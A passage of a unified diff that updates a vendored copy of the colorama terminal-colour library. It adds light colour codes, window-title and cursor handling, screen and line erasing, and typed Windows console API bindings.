|
||||
def code_to_chars(code):
|
||||
return CSI + str(code) + 'm'
|
||||
|
||||
def set_title(title):
|
||||
return OSC + '2;' + title + BEL
|
||||
|
||||
def clear_screen(mode=2):
|
||||
return CSI + str(mode) + 'J'
|
||||
|
||||
def clear_line(mode=2):
|
||||
return CSI + str(mode) + 'K'
|
||||
|
||||
|
||||
class AnsiCodes(object):
|
||||
def __init__(self, codes):
|
||||
for name in dir(codes):
|
||||
def __init__(self):
|
||||
# the subclasses declare class attributes which are numbers.
|
||||
# Upon instantiation we define instance attributes, which are the same
|
||||
# as the class attributes but wrapped with the ANSI escape sequence
|
||||
for name in dir(self):
|
||||
if not name.startswith('_'):
|
||||
value = getattr(codes, name)
|
||||
value = getattr(self, name)
|
||||
setattr(self, name, code_to_chars(value))
|
||||
|
||||
class AnsiFore:
|
||||
BLACK = 30
|
||||
RED = 31
|
||||
GREEN = 32
|
||||
YELLOW = 33
|
||||
BLUE = 34
|
||||
MAGENTA = 35
|
||||
CYAN = 36
|
||||
WHITE = 37
|
||||
RESET = 39
|
||||
|
||||
class AnsiBack:
|
||||
BLACK = 40
|
||||
RED = 41
|
||||
GREEN = 42
|
||||
YELLOW = 43
|
||||
BLUE = 44
|
||||
MAGENTA = 45
|
||||
CYAN = 46
|
||||
WHITE = 47
|
||||
RESET = 49
|
||||
class AnsiCursor(object):
|
||||
def UP(self, n=1):
|
||||
return CSI + str(n) + 'A'
|
||||
def DOWN(self, n=1):
|
||||
return CSI + str(n) + 'B'
|
||||
def FORWARD(self, n=1):
|
||||
return CSI + str(n) + 'C'
|
||||
def BACK(self, n=1):
|
||||
return CSI + str(n) + 'D'
|
||||
def POS(self, x=1, y=1):
|
||||
return CSI + str(y) + ';' + str(x) + 'H'
|
||||
|
||||
class AnsiStyle:
|
||||
|
||||
class AnsiFore(AnsiCodes):
|
||||
BLACK = 30
|
||||
RED = 31
|
||||
GREEN = 32
|
||||
YELLOW = 33
|
||||
BLUE = 34
|
||||
MAGENTA = 35
|
||||
CYAN = 36
|
||||
WHITE = 37
|
||||
RESET = 39
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 90
|
||||
LIGHTRED_EX = 91
|
||||
LIGHTGREEN_EX = 92
|
||||
LIGHTYELLOW_EX = 93
|
||||
LIGHTBLUE_EX = 94
|
||||
LIGHTMAGENTA_EX = 95
|
||||
LIGHTCYAN_EX = 96
|
||||
LIGHTWHITE_EX = 97
|
||||
|
||||
|
||||
class AnsiBack(AnsiCodes):
|
||||
BLACK = 40
|
||||
RED = 41
|
||||
GREEN = 42
|
||||
YELLOW = 43
|
||||
BLUE = 44
|
||||
MAGENTA = 45
|
||||
CYAN = 46
|
||||
WHITE = 47
|
||||
RESET = 49
|
||||
|
||||
# These are fairly well supported, but not part of the standard.
|
||||
LIGHTBLACK_EX = 100
|
||||
LIGHTRED_EX = 101
|
||||
LIGHTGREEN_EX = 102
|
||||
LIGHTYELLOW_EX = 103
|
||||
LIGHTBLUE_EX = 104
|
||||
LIGHTMAGENTA_EX = 105
|
||||
LIGHTCYAN_EX = 106
|
||||
LIGHTWHITE_EX = 107
|
||||
|
||||
|
||||
class AnsiStyle(AnsiCodes):
|
||||
BRIGHT = 1
|
||||
DIM = 2
|
||||
NORMAL = 22
|
||||
RESET_ALL = 0
|
||||
|
||||
Fore = AnsiCodes( AnsiFore )
|
||||
Back = AnsiCodes( AnsiBack )
|
||||
Style = AnsiCodes( AnsiStyle )
|
||||
|
||||
Fore = AnsiFore()
|
||||
Back = AnsiBack()
|
||||
Style = AnsiStyle()
|
||||
Cursor = AnsiCursor()
|
||||
|
||||
113
thirdparty/colorama/ansitowin32.py
vendored
113
thirdparty/colorama/ansitowin32.py
vendored
@@ -1,16 +1,22 @@
|
||||
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import re
|
||||
import sys
|
||||
import os
|
||||
|
||||
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
|
||||
from .winterm import WinTerm, WinColor, WinStyle
|
||||
from .win32 import windll
|
||||
from .win32 import windll, winapi_test
|
||||
|
||||
|
||||
winterm = None
|
||||
if windll is not None:
|
||||
winterm = WinTerm()
|
||||
|
||||
|
||||
def is_stream_closed(stream):
|
||||
return not hasattr(stream, 'closed') or stream.closed
|
||||
|
||||
|
||||
def is_a_tty(stream):
|
||||
return hasattr(stream, 'isatty') and stream.isatty()
|
||||
|
||||
@@ -40,7 +46,8 @@ class AnsiToWin32(object):
|
||||
sequences from the text, and if outputting to a tty, will convert them into
|
||||
win32 function calls.
|
||||
'''
|
||||
ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
|
||||
ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer
|
||||
ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?') # Operating System Command
|
||||
|
||||
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
|
||||
# The wrapped stream (normally sys.stdout or sys.stderr)
|
||||
@@ -52,16 +59,21 @@ class AnsiToWin32(object):
|
||||
# create the proxy wrapping our output stream
|
||||
self.stream = StreamWrapper(wrapped, self)
|
||||
|
||||
on_windows = sys.platform.startswith('win')
|
||||
on_windows = os.name == 'nt'
|
||||
# We test if the WinAPI works, because even if we are on Windows
|
||||
# we may be using a terminal that doesn't support the WinAPI
|
||||
# (e.g. Cygwin Terminal). In this case it's up to the terminal
|
||||
# to support the ANSI codes.
|
||||
conversion_supported = on_windows and winapi_test()
|
||||
|
||||
# should we strip ANSI sequences from our output?
|
||||
if strip is None:
|
||||
strip = on_windows
|
||||
strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))
|
||||
self.strip = strip
|
||||
|
||||
# should we should convert ANSI sequences into win32 calls?
|
||||
if convert is None:
|
||||
convert = on_windows and is_a_tty(wrapped)
|
||||
convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)
|
||||
self.convert = convert
|
||||
|
||||
# dict of ansi codes to win32 functions and parameters
|
||||
@@ -70,7 +82,6 @@ class AnsiToWin32(object):
|
||||
# are we wrapping stderr?
|
||||
self.on_stderr = self.wrapped is sys.stderr
|
||||
|
||||
|
||||
def should_wrap(self):
|
||||
'''
|
||||
True if this class is actually needed. If false, then the output
|
||||
@@ -81,7 +92,6 @@ class AnsiToWin32(object):
|
||||
'''
|
||||
return self.convert or self.strip or self.autoreset
|
||||
|
||||
|
||||
def get_win32_calls(self):
|
||||
if self.convert and winterm:
|
||||
return {
|
||||
@@ -98,6 +108,14 @@ class AnsiToWin32(object):
|
||||
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
|
||||
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
|
||||
AnsiFore.RESET: (winterm.fore, ),
|
||||
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
|
||||
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
|
||||
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
|
||||
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
|
||||
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
|
||||
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
|
||||
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
|
||||
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
|
||||
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
|
||||
AnsiBack.RED: (winterm.back, WinColor.RED),
|
||||
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
|
||||
@@ -107,8 +125,16 @@ class AnsiToWin32(object):
|
||||
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
|
||||
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
|
||||
AnsiBack.RESET: (winterm.back, ),
|
||||
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
|
||||
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
|
||||
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
|
||||
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
|
||||
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
|
||||
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
|
||||
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
|
||||
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
|
||||
}
|
||||
|
||||
return dict()
|
||||
|
||||
def write(self, text):
|
||||
if self.strip or self.convert:
|
||||
@@ -123,7 +149,7 @@ class AnsiToWin32(object):
|
||||
def reset_all(self):
|
||||
if self.convert:
|
||||
self.call_win32('m', (0,))
|
||||
elif is_a_tty(self.wrapped):
|
||||
elif not self.strip and not is_stream_closed(self.wrapped):
|
||||
self.wrapped.write(Style.RESET_ALL)
|
||||
|
||||
|
||||
@@ -134,7 +160,8 @@ class AnsiToWin32(object):
|
||||
calls.
|
||||
'''
|
||||
cursor = 0
|
||||
for match in self.ANSI_RE.finditer(text):
|
||||
text = self.convert_osc(text)
|
||||
for match in self.ANSI_CSI_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
self.write_plain_text(text, cursor, start)
|
||||
self.convert_ansi(*match.groups())
|
||||
@@ -150,21 +177,29 @@ class AnsiToWin32(object):
|
||||
|
||||
def convert_ansi(self, paramstring, command):
|
||||
if self.convert:
|
||||
params = self.extract_params(paramstring)
|
||||
params = self.extract_params(command, paramstring)
|
||||
self.call_win32(command, params)
|
||||
|
||||
|
||||
def extract_params(self, paramstring):
|
||||
def split(paramstring):
|
||||
for p in paramstring.split(';'):
|
||||
if p != '':
|
||||
yield int(p)
|
||||
return tuple(split(paramstring))
|
||||
def extract_params(self, command, paramstring):
|
||||
if command in 'Hf':
|
||||
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
|
||||
while len(params) < 2:
|
||||
# defaults:
|
||||
params = params + (1,)
|
||||
else:
|
||||
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
|
||||
if len(params) == 0:
|
||||
# defaults:
|
||||
if command in 'JKm':
|
||||
params = (0,)
|
||||
elif command in 'ABCD':
|
||||
params = (1,)
|
||||
|
||||
return params
|
||||
|
||||
|
||||
def call_win32(self, command, params):
|
||||
if params == []:
|
||||
params = [0]
|
||||
if command == 'm':
|
||||
for param in params:
|
||||
if param in self.win32_calls:
|
||||
@@ -173,17 +208,29 @@ class AnsiToWin32(object):
|
||||
args = func_args[1:]
|
||||
kwargs = dict(on_stderr=self.on_stderr)
|
||||
func(*args, **kwargs)
|
||||
elif command in ('H', 'f'): # set cursor position
|
||||
func = winterm.set_cursor_position
|
||||
func(params, on_stderr=self.on_stderr)
|
||||
elif command in ('J'):
|
||||
func = winterm.erase_data
|
||||
func(params, on_stderr=self.on_stderr)
|
||||
elif command == 'A':
|
||||
if params == () or params == None:
|
||||
num_rows = 1
|
||||
else:
|
||||
num_rows = params[0]
|
||||
func = winterm.cursor_up
|
||||
func(num_rows, on_stderr=self.on_stderr)
|
||||
elif command in 'J':
|
||||
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'K':
|
||||
winterm.erase_line(params[0], on_stderr=self.on_stderr)
|
||||
elif command in 'Hf': # cursor position - absolute
|
||||
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
|
||||
elif command in 'ABCD': # cursor position - relative
|
||||
n = params[0]
|
||||
# A - up, B - down, C - forward, D - back
|
||||
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
|
||||
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
|
||||
|
||||
|
||||
def convert_osc(self, text):
|
||||
for match in self.ANSI_OSC_RE.finditer(text):
|
||||
start, end = match.span()
|
||||
text = text[:start] + text[end:]
|
||||
paramstring, command = match.groups()
|
||||
if command in '\x07': # \x07 = BEL
|
||||
params = paramstring.split(";")
|
||||
# 0 - change title and icon (we will only change title)
|
||||
# 1 - change icon (we don't support this)
|
||||
# 2 - change title
|
||||
if params[0] in '02':
|
||||
winterm.set_title(params[1])
|
||||
return text
|
||||
|
||||
62
thirdparty/colorama/initialise.py
vendored
62
thirdparty/colorama/initialise.py
vendored
@@ -1,32 +1,48 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
import atexit
|
||||
import contextlib
|
||||
import sys
|
||||
|
||||
from .ansitowin32 import AnsiToWin32
|
||||
|
||||
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
orig_stdout = None
|
||||
orig_stderr = None
|
||||
|
||||
wrapped_stdout = sys.stdout
|
||||
wrapped_stderr = sys.stderr
|
||||
wrapped_stdout = None
|
||||
wrapped_stderr = None
|
||||
|
||||
atexit_done = False
|
||||
|
||||
|
||||
def reset_all():
|
||||
AnsiToWin32(orig_stdout).reset_all()
|
||||
if AnsiToWin32 is not None: # Issue #74: objects might become None at exit
|
||||
AnsiToWin32(orig_stdout).reset_all()
|
||||
|
||||
|
||||
def init(autoreset=False, convert=None, strip=None, wrap=True):
|
||||
global wrapped_stdout, wrapped_stderr
|
||||
global orig_stdout, orig_stderr
|
||||
|
||||
if orig_stdout is not None:
|
||||
return
|
||||
|
||||
if not wrap and any([autoreset, convert, strip]):
|
||||
raise ValueError('wrap=False conflicts with any other arg=True')
|
||||
|
||||
global wrapped_stdout, wrapped_stderr
|
||||
sys.stdout = wrapped_stdout = \
|
||||
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
|
||||
sys.stderr = wrapped_stderr = \
|
||||
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
|
||||
orig_stdout = sys.stdout
|
||||
orig_stderr = sys.stderr
|
||||
|
||||
if sys.stdout is None:
|
||||
wrapped_stdout = None
|
||||
else:
|
||||
sys.stdout = wrapped_stdout = \
|
||||
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
|
||||
if sys.stderr is None:
|
||||
wrapped_stderr = None
|
||||
else:
|
||||
sys.stderr = wrapped_stderr = \
|
||||
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
|
||||
|
||||
global atexit_done
|
||||
if not atexit_done:
|
||||
@@ -35,13 +51,31 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
|
||||
|
||||
|
||||
def deinit():
|
||||
sys.stdout = orig_stdout
|
||||
sys.stderr = orig_stderr
|
||||
global orig_stdout
|
||||
global orig_stderr
|
||||
|
||||
if orig_stdout is not None:
|
||||
sys.stdout = orig_stdout
|
||||
orig_stdout = None
|
||||
if orig_stderr is not None:
|
||||
sys.stderr = orig_stderr
|
||||
orig_stderr = None
|
||||
|
||||
|
||||
@contextlib.contextmanager
|
||||
def colorama_text(*args, **kwargs):
|
||||
init(*args, **kwargs)
|
||||
try:
|
||||
yield
|
||||
finally:
|
||||
deinit()
|
||||
|
||||
|
||||
def reinit():
|
||||
sys.stdout = wrapped_stdout
|
||||
sys.stderr = wrapped_stdout
|
||||
if wrapped_stdout is not None:
|
||||
sys.stdout = wrapped_stdout
|
||||
if wrapped_stderr is not None:
|
||||
sys.stderr = wrapped_stderr
|
||||
|
||||
|
||||
def wrap_stream(stream, convert, strip, autoreset, wrap):
|
||||
|
||||
145
thirdparty/colorama/win32.py
vendored
145
thirdparty/colorama/win32.py
vendored
@@ -1,51 +1,30 @@
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
|
||||
# from winbase.h
|
||||
STDOUT = -11
|
||||
STDERR = -12
|
||||
|
||||
try:
|
||||
from ctypes import windll
|
||||
except ImportError:
|
||||
import ctypes
|
||||
from ctypes import LibraryLoader
|
||||
windll = LibraryLoader(ctypes.WinDLL)
|
||||
from ctypes import wintypes
|
||||
except (AttributeError, ImportError):
|
||||
windll = None
|
||||
SetConsoleTextAttribute = lambda *_: None
|
||||
winapi_test = lambda *_: None
|
||||
else:
|
||||
from ctypes import (
|
||||
byref, Structure, c_char, c_short, c_uint32, c_ushort
|
||||
)
|
||||
from ctypes import byref, Structure, c_char, POINTER
|
||||
|
||||
handles = {
|
||||
STDOUT: windll.kernel32.GetStdHandle(STDOUT),
|
||||
STDERR: windll.kernel32.GetStdHandle(STDERR),
|
||||
}
|
||||
|
||||
SHORT = c_short
|
||||
WORD = c_ushort
|
||||
DWORD = c_uint32
|
||||
TCHAR = c_char
|
||||
|
||||
class COORD(Structure):
|
||||
"""struct in wincon.h"""
|
||||
_fields_ = [
|
||||
('X', SHORT),
|
||||
('Y', SHORT),
|
||||
]
|
||||
|
||||
class SMALL_RECT(Structure):
|
||||
"""struct in wincon.h."""
|
||||
_fields_ = [
|
||||
("Left", SHORT),
|
||||
("Top", SHORT),
|
||||
("Right", SHORT),
|
||||
("Bottom", SHORT),
|
||||
]
|
||||
COORD = wintypes._COORD
|
||||
|
||||
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
|
||||
"""struct in wincon.h."""
|
||||
_fields_ = [
|
||||
("dwSize", COORD),
|
||||
("dwCursorPosition", COORD),
|
||||
("wAttributes", WORD),
|
||||
("srWindow", SMALL_RECT),
|
||||
("wAttributes", wintypes.WORD),
|
||||
("srWindow", wintypes.SMALL_RECT),
|
||||
("dwMaximumWindowSize", COORD),
|
||||
]
|
||||
def __str__(self):
|
||||
@@ -57,20 +36,83 @@ else:
|
||||
, self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
|
||||
)
|
||||
|
||||
_GetStdHandle = windll.kernel32.GetStdHandle
|
||||
_GetStdHandle.argtypes = [
|
||||
wintypes.DWORD,
|
||||
]
|
||||
_GetStdHandle.restype = wintypes.HANDLE
|
||||
|
||||
_GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
|
||||
_GetConsoleScreenBufferInfo.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
POINTER(CONSOLE_SCREEN_BUFFER_INFO),
|
||||
]
|
||||
_GetConsoleScreenBufferInfo.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
|
||||
_SetConsoleTextAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
]
|
||||
_SetConsoleTextAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
|
||||
_SetConsoleCursorPosition.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
COORD,
|
||||
]
|
||||
_SetConsoleCursorPosition.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
|
||||
_FillConsoleOutputCharacterA.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
c_char,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputCharacterA.restype = wintypes.BOOL
|
||||
|
||||
_FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
|
||||
_FillConsoleOutputAttribute.argtypes = [
|
||||
wintypes.HANDLE,
|
||||
wintypes.WORD,
|
||||
wintypes.DWORD,
|
||||
COORD,
|
||||
POINTER(wintypes.DWORD),
|
||||
]
|
||||
_FillConsoleOutputAttribute.restype = wintypes.BOOL
|
||||
|
||||
_SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
|
||||
_SetConsoleTitleW.argtypes = [
|
||||
wintypes.LPCSTR
|
||||
]
|
||||
_SetConsoleTitleW.restype = wintypes.BOOL
|
||||
|
||||
handles = {
|
||||
STDOUT: _GetStdHandle(STDOUT),
|
||||
STDERR: _GetStdHandle(STDERR),
|
||||
}
|
||||
|
||||
def winapi_test():
|
||||
handle = handles[STDOUT]
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return bool(success)
|
||||
|
||||
def GetConsoleScreenBufferInfo(stream_id=STDOUT):
|
||||
handle = handles[stream_id]
|
||||
csbi = CONSOLE_SCREEN_BUFFER_INFO()
|
||||
success = windll.kernel32.GetConsoleScreenBufferInfo(
|
||||
success = _GetConsoleScreenBufferInfo(
|
||||
handle, byref(csbi))
|
||||
return csbi
|
||||
|
||||
|
||||
def SetConsoleTextAttribute(stream_id, attrs):
|
||||
handle = handles[stream_id]
|
||||
return windll.kernel32.SetConsoleTextAttribute(handle, attrs)
|
||||
return _SetConsoleTextAttribute(handle, attrs)
|
||||
|
||||
|
||||
def SetConsoleCursorPosition(stream_id, position):
|
||||
def SetConsoleCursorPosition(stream_id, position, adjust=True):
|
||||
position = COORD(*position)
|
||||
# If the position is out of range, do nothing.
|
||||
if position.Y <= 0 or position.X <= 0:
|
||||
@@ -79,31 +121,34 @@ else:
|
||||
# 1. being 0-based, while ANSI is 1-based.
|
||||
# 2. expecting (x,y), while ANSI uses (y,x).
|
||||
adjusted_position = COORD(position.Y - 1, position.X - 1)
|
||||
# Adjust for viewport's scroll position
|
||||
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
|
||||
adjusted_position.Y += sr.Top
|
||||
adjusted_position.X += sr.Left
|
||||
if adjust:
|
||||
# Adjust for viewport's scroll position
|
||||
sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
|
||||
adjusted_position.Y += sr.Top
|
||||
adjusted_position.X += sr.Left
|
||||
# Resume normal processing
|
||||
handle = handles[stream_id]
|
||||
return windll.kernel32.SetConsoleCursorPosition(handle, adjusted_position)
|
||||
return _SetConsoleCursorPosition(handle, adjusted_position)
|
||||
|
||||
def FillConsoleOutputCharacter(stream_id, char, length, start):
|
||||
handle = handles[stream_id]
|
||||
char = TCHAR(char)
|
||||
length = DWORD(length)
|
||||
num_written = DWORD(0)
|
||||
char = c_char(char.encode())
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
success = windll.kernel32.FillConsoleOutputCharacterA(
|
||||
success = _FillConsoleOutputCharacterA(
|
||||
handle, char, length, start, byref(num_written))
|
||||
return num_written.value
|
||||
|
||||
def FillConsoleOutputAttribute(stream_id, attr, length, start):
|
||||
''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
|
||||
handle = handles[stream_id]
|
||||
attribute = WORD(attr)
|
||||
length = DWORD(length)
|
||||
num_written = DWORD(0)
|
||||
attribute = wintypes.WORD(attr)
|
||||
length = wintypes.DWORD(length)
|
||||
num_written = wintypes.DWORD(0)
|
||||
# Note that this is hard-coded for ANSI (vs wide) bytes.
|
||||
return windll.kernel32.FillConsoleOutputAttribute(
|
||||
return _FillConsoleOutputAttribute(
|
||||
handle, attribute, length, start, byref(num_written))
|
||||
|
||||
def SetConsoleTitle(title):
|
||||
return _SetConsoleTitleW(title)
|
||||
|
||||
104
thirdparty/colorama/winterm.py
vendored
104
thirdparty/colorama/winterm.py
vendored
@@ -1,4 +1,4 @@
|
||||
|
||||
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
|
||||
from . import win32
|
||||
|
||||
|
||||
@@ -15,9 +15,9 @@ class WinColor(object):
|
||||
|
||||
# from wincon.h
|
||||
class WinStyle(object):
|
||||
NORMAL = 0x00 # dim text, dim background
|
||||
BRIGHT = 0x08 # bright text, dim background
|
||||
|
||||
NORMAL = 0x00 # dim text, dim background
|
||||
BRIGHT = 0x08 # bright text, dim background
|
||||
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
|
||||
|
||||
class WinTerm(object):
|
||||
|
||||
@@ -27,29 +27,44 @@ class WinTerm(object):
|
||||
self._default_fore = self._fore
|
||||
self._default_back = self._back
|
||||
self._default_style = self._style
|
||||
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
|
||||
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
|
||||
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
|
||||
# and BRIGHT is overwritten by Style codes.
|
||||
self._light = 0
|
||||
|
||||
def get_attrs(self):
|
||||
return self._fore + self._back * 16 + self._style
|
||||
return self._fore + self._back * 16 + (self._style | self._light)
|
||||
|
||||
def set_attrs(self, value):
|
||||
self._fore = value & 7
|
||||
self._back = (value >> 4) & 7
|
||||
self._style = value & WinStyle.BRIGHT
|
||||
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
|
||||
|
||||
def reset_all(self, on_stderr=None):
|
||||
self.set_attrs(self._default)
|
||||
self.set_console(attrs=self._default)
|
||||
|
||||
def fore(self, fore=None, on_stderr=False):
|
||||
def fore(self, fore=None, light=False, on_stderr=False):
|
||||
if fore is None:
|
||||
fore = self._default_fore
|
||||
self._fore = fore
|
||||
# Emulate LIGHT_EX with BRIGHT Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def back(self, back=None, on_stderr=False):
|
||||
def back(self, back=None, light=False, on_stderr=False):
|
||||
if back is None:
|
||||
back = self._default_back
|
||||
self._back = back
|
||||
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
|
||||
if light:
|
||||
self._light |= WinStyle.BRIGHT_BACKGROUND
|
||||
else:
|
||||
self._light &= ~WinStyle.BRIGHT_BACKGROUND
|
||||
self.set_console(on_stderr=on_stderr)
|
||||
|
||||
def style(self, style=None, on_stderr=False):
|
||||
@@ -76,45 +91,72 @@ class WinTerm(object):
|
||||
|
||||
def set_cursor_position(self, position=None, on_stderr=False):
|
||||
if position is None:
|
||||
#I'm not currently tracking the position, so there is no default.
|
||||
#position = self.get_position()
|
||||
# I'm not currently tracking the position, so there is no default.
|
||||
# position = self.get_position()
|
||||
return
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
win32.SetConsoleCursorPosition(handle, position)
|
||||
|
||||
def cursor_up(self, num_rows=0, on_stderr=False):
|
||||
if num_rows == 0:
|
||||
return
|
||||
def cursor_adjust(self, x, y, on_stderr=False):
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
position = self.get_position(handle)
|
||||
adjusted_position = (position.Y - num_rows, position.X)
|
||||
self.set_cursor_position(adjusted_position, on_stderr)
|
||||
adjusted_position = (position.Y + y, position.X + x)
|
||||
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
|
||||
|
||||
def erase_data(self, mode=0, on_stderr=False):
|
||||
# 0 (or None) should clear from the cursor to the end of the screen.
|
||||
def erase_screen(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the screen.
|
||||
# 1 should clear from the cursor to the beginning of the screen.
|
||||
# 2 should clear the entire screen. (And maybe move cursor to (1,1)?)
|
||||
#
|
||||
# At the moment, I only support mode 2. From looking at the API, it
|
||||
# should be possible to calculate a different number of bytes to clear,
|
||||
# and to do so relative to the cursor position.
|
||||
if mode[0] not in (2,):
|
||||
return
|
||||
# 2 should clear the entire screen, and move cursor to (1,1)
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
# here's where we'll home the cursor
|
||||
coord_screen = win32.COORD(0,0)
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
# get the number of character cells in the current buffer
|
||||
dw_con_size = csbi.dwSize.X * csbi.dwSize.Y
|
||||
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
|
||||
# get number of character cells before current cursor position
|
||||
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = cells_in_screen - cells_before_cursor
|
||||
if mode == 1:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_before_cursor
|
||||
elif mode == 2:
|
||||
from_coord = win32.COORD(0, 0)
|
||||
cells_to_erase = cells_in_screen
|
||||
# fill the entire screen with blanks
|
||||
win32.FillConsoleOutputCharacter(handle, ord(' '), dw_con_size, coord_screen)
|
||||
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
|
||||
# now set the buffer's attributes accordingly
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), dw_con_size, coord_screen );
|
||||
# put the cursor at (0, 0)
|
||||
win32.SetConsoleCursorPosition(handle, (coord_screen.X, coord_screen.Y))
|
||||
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
|
||||
if mode == 2:
|
||||
# put the cursor where needed
|
||||
win32.SetConsoleCursorPosition(handle, (1, 1))
|
||||
|
||||
def erase_line(self, mode=0, on_stderr=False):
|
||||
# 0 should clear from the cursor to the end of the line.
|
||||
# 1 should clear from the cursor to the beginning of the line.
|
||||
# 2 should clear the entire line.
|
||||
handle = win32.STDOUT
|
||||
if on_stderr:
|
||||
handle = win32.STDERR
|
||||
csbi = win32.GetConsoleScreenBufferInfo(handle)
|
||||
if mode == 0:
|
||||
from_coord = csbi.dwCursorPosition
|
||||
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
|
||||
if mode == 1:
|
||||
